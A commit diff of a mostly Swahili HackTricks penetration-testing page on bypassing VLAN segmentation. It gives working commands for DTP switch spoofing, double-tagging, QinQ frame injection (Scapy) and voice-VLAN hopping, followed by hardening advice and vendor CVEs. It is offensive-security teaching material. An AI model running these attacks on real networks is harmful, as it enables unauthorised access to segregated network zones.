maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/generic-methodologies-and-resources/pentesting-network/

Browse Source
This commit is contained in:
Translator 2025-08-18 12:38:31 +00:00
parent 0ffd087173
commit 60ab4c9735
1 changed files with 65 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

89
src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
Ikiwa ufikiaji wa moja kwa moja kwa swichi upo, segmentation ya VLAN inaweza kupuuziliwa mbali. Hii inahusisha kubadilisha usanidi wa bandari iliyounganishwa kuwa hali ya trunk, kuanzisha interfaces za virtual kwa VLAN zinazolengwa, na kuweka anwani za IP, ama kwa njia ya kidinamik (DHCP) au kwa njia ya statiki, kulingana na hali (**kwa maelezo zaidi angalia [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
Ikiwa ufikiaji wa moja kwa moja kwa swichi upo, segmentation ya VLAN inaweza kupuuziliwa mbali. Hii inahusisha kurekebisha bandari iliyounganishwa kuwa hali ya trunk, kuanzisha interfaces za virtual kwa VLAN zinazolengwa, na kuweka anwani za IP, ama kwa njia ya kidinamik (DHCP) au kwa njia ya statiki, kulingana na hali (**kwa maelezo zaidi angalia [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
Kwanza, utambulisho wa bandari maalum iliyounganishwa unahitajika. Hii kwa kawaida inaweza kufanywa kupitia ujumbe wa CDP, au kwa kutafuta bandari kupitia **include** mask.
@ -20,10 +20,11 @@ SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk
```
K переключению в режим trunk временно прервёт подключение, но это можно восстановить впоследствии.
Kubadilisha kuwa hali ya trunk kutasababisha kuharibika kwa muunganisho kwa muda, lakini hii inaweza kurejeshwa baadaye.
Kisha, interfaces za virtual zinaundwa, zinapewa VLAN IDs, na kuanzishwa:
Mikondo ya virtual kisha inaundwa, inatolewa ID za VLAN, na kuanzishwa:
```bash
# Legacy (vconfig) still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
@ -32,17 +33,26 @@ sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up
# Modern (ip-link preferred)
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip link set eth0.10 up
sudo ip link set eth0.20 up
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
Kisha, ombi la anwani linafanywa kupitia DHCP. Vinginevyo, katika hali ambapo DHCP haiwezekani, anwani zinaweza kuwekwa kwa mikono:
```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
Mfano wa kuweka anwani ya IP ya kudumu kwenye kiunganishi (VLAN 10):
```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
# or
sudo ip addr add 10.10.10.66/24 dev eth0.10
```
Connectivity inajaribiwa kwa kuanzisha maombi ya ICMP kwa milango ya kawaida ya VLANs 10, 20, 50, na 60.
@ -56,27 +66,34 @@ Njia ya awali inadhani ufikiaji wa kuthibitishwa wa console au Telnet/SSH kwa sw
### 1. Switch-Spoofing na Protokali ya Trunking ya Kijadi (DTP)
Swichi za Cisco ambazo zina DTP imewezeshwa zitafurahia kujadili trunk ikiwa mwenzi anadai kuwa swichi. Kuunda fremu moja ya **DTP “desirable”** au **“trunk”** kunabadilisha bandari ya ufikiaji kuwa trunk ya 802.1Q inayobeba *VLANs* zote zinazoruhusiwa.
Swichi za Cisco ambazo zina DTP imewezeshwa zitafurahia kujadili trunk ikiwa mwenza anadai kuwa swichi. Kuunda fremu moja ya **DTP “desirable”** au **“trunk”** kunabadilisha bandari ya ufikiaji kuwa trunk ya 802.1Q inayobeba *VLANs* zote zinazoruhusiwa.
*Yersinia* na PoCs kadhaa zinafanya mchakato huo kuwa wa kiotomatiki:
*Yersinia* na PoCs kadhaa zinafanya mchakato huu kuwa wa kiotomatiki:
```bash
# Become a trunk using Yersinia (GUI)
$ sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking
sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking
# Python PoC (dtp-spoof)
$ git clone https://github.com/fleetcaptain/dtp-spoof.git
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
git clone https://github.com/fleetcaptain/dtp-spoof.git
sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
```
Mara tu bandari inapoenda kwenye trunk unaweza kuunda 802.1Q sub-interfaces na pivot kama ilivyoonyeshwa katika sehemu iliyopita. Mifumo ya kisasa ya Linux haitaji tena *vconfig*; badala yake tumia *ip link*:
Msaada wa Recon (kufanya fingerprint kwa pasivu hali ya DTP ya bandari):
```bash
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up
```
### 2. Double-Tagging (Native-VLAN Abuse)
Ikiwa mshambuliaji yuko kwenye **native (untagged) VLAN**, fremu iliyoundwa yenye *michwa miwili* ya 802.1Q inaweza "kuruka" hadi VLAN ya pili hata wakati bandari imefungwa katika hali ya ufikiaji. Zana kama **VLANPWN DoubleTagging.py** (2022-2024 refresh) inafanya kiotomatiki sindikiza:
# or
wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
sudo python3 dtpscan.py -i eth0
```
Mara tu bandari inapoenda kwenye trunk unaweza kuunda sub-interfaces za 802.1Q na kuhamasisha kama ilivyoonyeshwa katika sehemu iliyopita.
### 2. Double-Tagging (Kunyanyaswa kwa Native-VLAN)
Ikiwa mshambuliaji yuko kwenye **native (untagged) VLAN**, fremu iliyoundwa kwa *mbili* 802.1Q headers inaweza kuhamia kwenye VLAN ya pili hata wakati bandari imefungwa katika hali ya ufikiaji. Zana kama **VLANPWN DoubleTagging.py** (2022-2025 refresh) inafanya kiotomatiki sindano:
```bash
python3 DoubleTagging.py \
--interface eth0 \
@ -85,15 +102,9 @@ python3 DoubleTagging.py \
--victim 10.10.20.24 \
--attacker 10.10.1.54
```
Packet walk-through:
1. Outer tag (1) inakatwa na swichi ya kwanza kwa sababu inalingana na native VLAN.
2. Inner tag (20) sasa inafichuliwa; fremu inasambazwa kwenye trunk kuelekea VLAN 20.
Teknolojia hii bado inafanya kazi mwaka 2025 kwenye mitandao ambayo inacha native VLAN kuwa ya kawaida na inakubali fremu zisizo na tag.
### 3. QinQ (802.1ad) Stacking
Mifumo mingi ya biashara inasaidia *Q-in-Q* huduma ya mtoa huduma encapsulation. Pale ambapo inaruhusiwa, mshambuliaji anaweza kutengeneza tunnel ya trafiki yoyote iliyo na tag ya 802.1Q ndani ya mtoa huduma (S-tag) ili kuvuka maeneo ya usalama. Capture kwa 802.1ad ethertype 0x88a8 na jaribu kupiga tag ya nje kwa kutumia Scapy:
Mifumo mingi ya biashara inasaidia *Q-in-Q* encapsulation ya mtoa huduma. Pale inaporuhusiwa, mshambuliaji anaweza kutengeneza tunnel ya trafiki yoyote iliyo na lebo ya 802.1Q ndani ya mtoa huduma (S-tag) ili kuvuka maeneo ya usalama. Kamateni kwa ethertype `0x88a8` na jaribu kuondoa lebo ya nje kwa kutumia Scapy:
```python
from scapy.all import *
outer = 100 # Service tag
@ -102,15 +113,43 @@ payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")
```
### 4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)
Corporate access ports often sit in an *“access + voice”* configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled.
*VoIP Hopper* (packaged in Kali 2025.2) supports CDP, DHCP options **176/242**, and full LLDP-MED spoofing:
```bash
# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940
# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z
# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN
```
Teknolojia hii inapita mchakato wa kutenganisha data/sauti na ni ya kawaida sana kwenye swichi za mipakani za biashara mwaka 2025 kwa sababu LLDP auto-policy imewezeshwa kwa chaguo-msingi kwenye mifano mingi.
---
## Mapendekezo ya Kijamii
## Mapendekezo ya Kijeshi
1. Zima DTP kwenye bandari zote zinazokabiliwa na mtumiaji: `switchport mode access` + `switchport nonegotiate`.
2. Badilisha VLAN asilia kwenye kila trunk kuwa **VLAN isiyotumika, black-hole** na uweke alama: `vlan dot1q tag native`.
3. Punguza VLAN zisizohitajika kwenye trunks: `switchport trunk allowed vlan 10,20`.
4. Lazimisha usalama wa bandari, DHCP snooping & ukaguzi wa ARP wa dynamic ili kupunguza shughuli za Layer-2 zisizo za kawaida.
5. Prefer private-VLANs au segmentation ya L3 badala ya kutegemea tu kutenganisha 802.1Q.
4. Tekeleza usalama wa bandari, DHCP snooping, ukaguzi wa ARP wa dynamic **na 802.1X** ili kupunguza shughuli za Layer-2 zisizo halali.
5. Zima sera za sauti za LLDP-MED (au zifunge kwa MAC OUIs zilizothibitishwa) ikiwa ubandikaji wa simu za IP hauhitajiki.
6. Prefer private-VLANs au segmentation ya L3 badala ya kutegemea tu kutenganisha 802.1Q.
---
## Uhalisia wa Uthibitisho wa Wauzaji (2022-2024)
Hata usanidi wa swichi ulioimarishwa kabisa unaweza kuathiriwa na makosa ya firmware. Mifano ya hivi karibuni ni pamoja na:
* **CVE-2022-20728† Cisco Aironet/Catalyst Access Points** inaruhusu kuingiza kutoka VLAN asilia hadi VLAN zisizo za asilia za WLAN, ikipita kutenganisha wired/wireless.
* **CVE-2024-20465 (Cisco IOS Industrial Ethernet)** inaruhusu kupita kwa ACL kwenye SVIs baada ya kubadilisha Protokali ya Ethernet ya Kurejelea, ikivuja trafiki kati ya VRFs/VLANs. Patch 17.9.5 au baadaye.
Daima fuatilia taarifa za wauzaji kuhusu masuala ya kupita VLAN/ACL na uweke picha za miundombinu kuwa za kisasa.
---
@ -119,5 +158,7 @@ sendp(frame, iface="eth0")
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
- VLANPWN attack toolkit <https://github.com/casterbytethrowback/VLANPWN>
- Twingate "What is VLAN Hopping?" (Aug 2024) <https://www.twingate.com/blog/glossary/vlan%20hopping>
- VoIP Hopper project <https://github.com/hmgh0st/voiphopper>
- Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” <https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY>
{{#include ../../banners/hacktricks-training.md}}